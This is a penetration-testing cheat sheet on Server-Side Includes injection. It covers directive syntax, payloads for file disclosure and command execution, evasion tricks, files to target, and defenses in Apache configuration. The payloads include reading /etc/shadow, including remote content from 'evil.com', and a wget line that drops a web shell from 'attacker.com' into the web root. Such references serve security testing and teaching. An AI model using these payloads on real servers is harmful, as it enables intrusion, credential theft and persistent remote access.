What is SSI Injection?
Server-Side Includes (SSI) are directives in HTML pages that are evaluated on the server before the page is delivered to the client. SSI injection occurs when an attacker can inject these directives into a page that is then parsed by an SSI-enabled server.
SSI Directive Syntax
Basic syntax: <!--#directive parameter="value" -->
Common SSI Directives
File Operations
1
2
3
4
| <!--#include virtual="/path/to/file" -->
<!--#include file="/path/to/file" -->
<!--#flastmod file="index.html" -->
<!--#fsize file="index.html" -->
|
Command Execution
1
2
| <!--#exec cmd="command" -->
<!--#exec cgi="/cgi-bin/script.cgi" -->
|
Environment Variables
1
2
3
| <!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="REMOTE_ADDR" -->
|
Flow Control
1
2
3
4
| <!--#if expr="test_condition" -->
<!--#elif expr="test_condition" -->
<!--#else -->
<!--#endif -->
|
SSI Injection Attack Vectors
Basic Injection Test
1
| <!--#echo var="DATE_LOCAL" -->
|
If this renders the current date, the server processes SSI directives.
File Disclosure
1
2
| <!--#include virtual="/etc/passwd" -->
<!--#include file="/etc/passwd" -->
|
Remote File Inclusion
1
| <!--#include virtual="http://evil.com/malicious-script.html" -->
|
Command Execution
1
2
3
| <!--#exec cmd="ls -la" -->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="id" -->
|
Cross-Site Scripting via SSI
1
| <!--#echo var="QUERY_STRING_UNESCAPED" -->
|
Directory Traversal
1
| <!--#include virtual="../../../etc/passwd" -->
|
Advanced Techniques
Chained Exploits
1
| <!--#exec cmd="wget http://attacker.com/shell.php -O /var/www/html/shell.php" -->
|
Encoded Payloads
URL-encoded:
1
| %3C%21--%23exec%20cmd%3D%22id%22%20--%3E
|
Environment Variable Abuse
1
2
3
| <!--#if expr="${REQUEST_URI} = /admin" -->
<!--#set var="admin" value="true" -->
<!--#endif -->
|
1
2
3
| <!--#echo var="SERVER_SOFTWARE" -->
<!--#echo var="SERVER_NAME" -->
<!--#echo var="REMOTE_HOST" -->
|
Windows Systems
1
2
3
| <!--#exec cmd="dir C:\" -->
<!--#exec cmd="type C:\Windows\win.ini" -->
<!--#exec cmd="net users" -->
|
Unix/Linux Systems
1
2
3
| <!--#exec cmd="uname -a" -->
<!--#exec cmd="cat /etc/shadow" -->
<!--#exec cmd="netstat -an" -->
|
Web Server Specific
Apache
1
2
| <!--#exec cmd="apache2ctl -V" -->
<!--#include virtual="/.htaccess" -->
|
Nginx
1
| <!--#include virtual="/etc/nginx/nginx.conf" -->
|
Evasion Techniques
Obfuscation
1
| <!--#e<!--#e<!--#exec cmd="id"-->x<!--#e-->ec cmd="ls" -->
|
Alternative Expressions
1
2
3
| <!--#if expr="$DOCUMENT_URI = /\/admin\//?" -->
sensitive content
<!--#endif -->
|
1
| <!--#exec <!-- comment --> cmd="id" -->
|
Detection Methods
Testing for SSI Vulnerability
- Input:
<!--#echo var="DATE_LOCAL" --> - Expected output: Current date if vulnerable
Using Error Messages
Input: <!--#echo var="UNDEFINED_VARIABLE" -->
Common Files to Target
1
2
3
4
5
6
7
8
| /etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
/var/log/nginx/access.log
.htaccess
web.config
|
Defense Mechanisms
Server Configuration
- Disable SSI processing if not needed
- Use
IncludesNOEXEC option to disable exec command - Implement proper input validation
- Set restrictive file permissions
Apache Configuration
1
2
3
4
5
| <Directory "/var/www/html">
Options -Includes
# or
Options +IncludesNOEXEC
</Directory>
|
Nginx Configuration
Application-Level Defenses
- Validate and sanitize user input
- Implement proper output encoding
- Use Content Security Policy (CSP)
SSI File Extensions
SSI is typically processed in these file types:
.shtml.shtm.stm- Sometimes
.html if configured
References